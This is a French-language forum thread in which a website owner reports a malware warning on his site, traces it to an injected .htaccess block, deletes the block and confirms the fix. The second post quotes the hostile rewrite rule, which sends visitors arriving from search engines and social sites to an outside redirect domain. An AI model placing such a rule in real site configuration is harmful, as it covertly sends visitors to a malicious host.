qb77 Posted June 25, 2012 Share Posted June 25, 2012 (edited) Bonsoir, Tout d'abord je m'excuse d'écrire en français mais en anglais je ne vais pas y arriver. Merci aux modos de leur compréhension. Voici mon problème, depuis hier après midi Google indique que mon site contient un logiciel malvaillant ! Mon site est www.parabd.fr Voici le diagnostic de google : http://www.google.fr.../www.parabd.fr/ A chaque fois que l'on clique sur un lien du site on est transféré automatiquement sur une site suivant cette url : http://onmouseup.inf...?id_product=236 (exemple) J'ai remarqué également que pour certains article cela fonctionne correctement et pour d'autres ou la photo ne s'affiche pas on va sur le site ci-dessus. Avast ce déclanche également confirmant les propos de google concernant le logiciel malvaillant ! Su quelqu'un peux m'aider a me sortir de là ... Merci pour votre aide que j'espere rapide, car je suis en galère Quentin PS : dois je mettre le site en maintenance ? Edited June 25, 2012 by qb77 (see edit history) Link to comment Share on other sites More sharing options...
qb77 Posted June 25, 2012 Author Share Posted June 25, 2012 Après pas mal de recherche sur le web, je viens de trouver une information sur inte anglais qui donnerai comme source du problème les .htacess Et effectivement, ces lignes de commandes semblent anormales et ont été modifié le 21/06/2012 : #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://onmouseup.info/stats.php [R=301,L] </IfModule> #/c3284d# J'ai supprimé des lignes, j'attends maintenant la maj de google pour vous confirmer la réparation du problème. J'espère que cela pourra servir a d'autres ! Link to comment Share on other sites More sharing options...
qb77 Posted June 26, 2012 Author Share Posted June 26, 2012 le problème est résolu, google a mis a jour Link to comment Share on other sites More sharing options...
Recommended Posts